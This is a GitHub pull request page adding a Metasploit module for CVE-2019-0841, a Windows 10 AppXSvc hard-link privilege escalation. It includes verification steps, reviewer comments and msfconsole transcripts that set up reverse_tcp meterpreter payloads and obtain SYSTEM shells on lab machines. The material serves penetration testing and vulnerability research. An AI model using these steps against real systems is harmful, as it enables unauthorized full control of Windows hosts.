Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add module for CVE-2019-0841 #12070

Merged
merged 14 commits into from Jul 15, 2019
Merged

Add module for CVE-2019-0841 #12070

merged 14 commits into from Jul 15, 2019

Conversation

@space-r7
Copy link
Contributor

space-r7 commented Jul 8, 2019

This adds a module that exploits a privilege escalation vulnerability in Windows 10 builds prior to 17763.

Hard link and DiagHub code written by James Forshaw.

Resolves #11707

Verification

  • Start msfconsole
  • Get a low-privileged session
  • Do: use exploit/windows/local/appxsvc_hard_link_privesc
  • Do: set SESSION <session>
  • Do: set PAYLOAD <payload>
  • Do: set LHOST <ip>
  • Do: run
  • You should get a shell running as SYSTEM

Scenarios

  msf5 > use multi/handler
  msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf5 exploit(multi/handler) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(multi/handler) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444
  [*] Sending stage (206403 bytes) to 192.168.37.135
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.135:49985) at 2019-07-08 12:01:09 -0500

  meterpreter > getuid
  Server username: DESKTOP-L5FDSM7\Shelby Pace
  meterpreter > background
  [*] Backgrounding session 1...
  msf5 exploit(multi/handler) > use exploit/windows/local/appxsvc_hard_link_privesc
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 1
  session => 1
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp
  payload => windows/x64/meterpreter/reverse_tcp
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(windows/local/appxsvc_hard_link_privesc) > run

  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 192.168.37.1:4444
  [+] Successfully created hard link
  [*] Attempting to launch Microsoft Edge minimized.
  [*] Writing the payload to disk
  [*] Sending stage (206403 bytes) to 192.168.37.135
  [*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.135:49986) at 2019-07-08 12:02:02 -0500

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > sysinfo
  Computer        : DESKTOP-L5FDSM7
  OS              : Windows 10 (Build 16299).
  Architecture    : x64
  System Language : en_US
  Domain          : WORKGROUP
  Logged On Users : 2
  Meterpreter     : x64/windows
space-r7 added 8 commits Jun 6, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jul 9, 2019

I've seen other modules with the source code in its own directory such as external/source/exploits/<CVE#>, but I don't see that mentioned in the Wiki as a standard so maybe that's a non-issue.

@space-r7

This comment has been minimized.

Copy link
Contributor Author

space-r7 commented Jul 9, 2019

I've seen other modules with the source code in its own directory such as external/source/exploits/<CVE#>, but I don't see that mentioned in the Wiki as a standard so maybe that's a non-issue.

I'll go ahead and move them. Thanks!

space-r7 added 2 commits Jul 9, 2019
space-r7 and others added 3 commits Jul 9, 2019
Co-Authored-By: @shellfail <jrobles@rapid7.com>
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jul 9, 2019

#write_to_disk and #load_dll_with_diaghub share a lot of code.
Maybe create a generic #upload_file(file_name) and set f_name and exe_name in #exploit (combine the if/elsif from #write_to_disk and #load_dll_with_diaghub)

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jul 11, 2019

Nicely done amigo!

@space-r7

This comment has been minimized.

Copy link
Contributor Author

space-r7 commented Jul 11, 2019

Nicely done amigo!

Thank you!

@ccondon-r7

This comment has been minimized.

Copy link
Contributor

ccondon-r7 commented Jul 14, 2019

Love the teamwork :) Thanks for being awesome, all.

@jrobles-r7 jrobles-r7 self-assigned this Jul 15, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jul 15, 2019

msf5 exploit(windows/local/appxsvc_hard_link_privesc) > sessions

Active sessions
===============

  Id  Name  Type                     Information                                 Connection
  --  ----  ----                     -----------                                 ----------
  2         meterpreter x86/windows  DESKTOP-T6J3V2L\testuser @ DESKTOP-T6J3V2L  172.22.222.136:4444 -> 172.22.222.130:49860 (172.22.222.130)
  4         meterpreter x64/windows  DESKTOP-U2KHUKO\testuser @ DESKTOP-U2KHUKO  172.22.222.136:4444 -> 172.22.222.135:50076 (172.22.222.135)

msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 2
session => 2
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Successfully created hard link
[*] Attempting to launch Microsoft Edge minimized.
[*] Writing the payload to disk
[*] Sending stage (179779 bytes) to 172.22.222.130
[*] Meterpreter session 8 opened (172.22.222.136:4444 -> 172.22.222.130:50144) at 2019-07-15 09:15:56 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-T6J3V2L
OS              : Windows 10 (Build 15063).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > background
[*] Backgrounding session 8...
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set session 4
session => 4
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/local/appxsvc_hard_link_privesc) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.22.222.136:4444 
[+] Successfully created hard link
[*] Attempting to launch Microsoft Edge minimized.
[*] Writing the payload to disk
[*] Sending stage (206403 bytes) to 172.22.222.135
[*] Meterpreter session 9 opened (172.22.222.136:4444 -> 172.22.222.135:50097) at 2019-07-15 09:16:17 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-U2KHUKO
OS              : Windows 10 (Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >
@jrobles-r7 jrobles-r7 merged commit 70d67f1 into rapid7:master Jul 15, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
jrobles-r7 added a commit that referenced this pull request Jul 15, 2019
msjenkins-r7 added a commit that referenced this pull request Jul 15, 2019
@jrobles-r7

This comment has been minimized.

Copy link
Contributor

jrobles-r7 commented Jul 15, 2019

Release Notes

A module that targets CVE-2019-0841 is now available. It exploits AppXSvc's improper handling of hard links to gain full privileges over a SYSTEM-owned file.

@space-r7 space-r7 deleted the space-r7:appxsvr_windows_lpe branch Jul 15, 2019
@tdoan-r7 tdoan-r7 added the rn-modules label Jul 24, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
5 participants
You can’t perform that action at this time.